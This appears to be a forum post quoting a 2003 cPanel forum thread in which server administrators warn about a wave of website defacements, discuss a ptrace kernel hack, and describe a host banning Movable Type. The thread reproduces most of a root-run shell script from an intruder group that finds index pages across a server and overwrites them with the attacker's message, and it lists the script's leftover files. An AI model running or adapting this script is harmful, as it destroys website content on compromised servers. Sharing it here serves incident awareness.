Here's what I found at the CPanel forum:
The first post:
QUOTE
Warning - Watch For This Site.
Someone I know just had their server nailed by this.
http://www.crimeperfectz.hpg.com.br/bi0s/devastadorWatch out for this.
cPanel.net Support Ticket Number:
__________________
See
http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
the next:
QUOTE
Sorry, you are right of course, here is that page. It is a shell script actually. This thread
http://forums.cpanel.net/showthread...&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.
#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
# ##
# Brazilians Intruders 0f Systens Team 2003 ##
# Contato: bi0s@mail.com ##
# irc.brasnet.org /j bi0sbr ##
# www.bi0s.kit.net ##
# Devastador de Server por OverKill_ ##
# ##
##################################################
########
procura_paginas() {
find /$DIR_LOG -name index.html >logs
find /$DIR_LOG -name index.htm >>logs
find /$DIR_LOG -name index.php >>logs
#find $DIR_LOG -name *wtmp* >>logs
LINHA=`wc logs |cut -c-7`
}
console() {
REMOVE CODE FOR SAFETY REASONS; echo "ok"
echo -n "==> Aguarde, procurando paginas.."
procura_paginas;
echo "encontrados $LINHA Paginas para Ownar"
sleep 5
echo -n "--> Colocando seu texto nas Paginas"
for log in `cat logs`
do
echo -n " -> in $log..."
cp $log $log.bak
echo $MY_TEXT >$log
echo "ok"
done
echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
echo "ok"
echo "((((( Agora é soh registra! )))))"
}
help() {
echo " Use: $0
"
echo "Exemplo: $0 'BI0S Ownz'"
}
if [ `whoami` != "root" ]; then
echo "[S] Execute somente como root"
exit
fi
if [ "$2" = "" ]; then
DIR_LOG="./"
else
DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo " www.bi0s.kit.net "
echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
help;
else
MY_TEXT="$1"
console;
fi
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
Last edited by dgbaker on 07-11-2003 at 10:28 PMAnd the next:
QUOTE
It was found out by going through bash_history.
Look for /root/mass2.sh /root/devastodor.sh
and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo
cPanel.net Support Ticket Number:
__________________
See
http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
And the next:
QUOTE
That is who hit us.
You can see he is proud of the hit here:
http://www.zone-h.org/en/defacement...r_defacer=BI0S/You can see the top 2 domians are on our server.
Both sites had Movable Type on them as well.
cPanel.net Support Ticket Number:
__________________
Thanks,
James Taylor
And here is what is being said by "Robert" the staffer at MyAcen. I suggest that MT contact them soonest!
QUOTE
It's lucky we are on top of things, cruise & brisbane had the ptrace hack on them. If the kernels were not updated regularly your data would be long gone.
I have since removed the files, and on the advise of nick he urges us to upgrade to phpsuexec asap. Moveable type was banned due to the above reason. People are getting in and executing shell based scripts somehow. No exact details have been found but most sites getting hacked are getting hacked via moveable type.
__________________
Get aload of thsi customer service!:
QUOTE
And as always we provide information. The files won't be removed they will just redirect to a search engine when called.
It's a tough decision to ban a script but when security is an issue I would rather loose a couple of customers that are hell bent on moveable type then getting a whole machine taken out by a script flaw.
and this: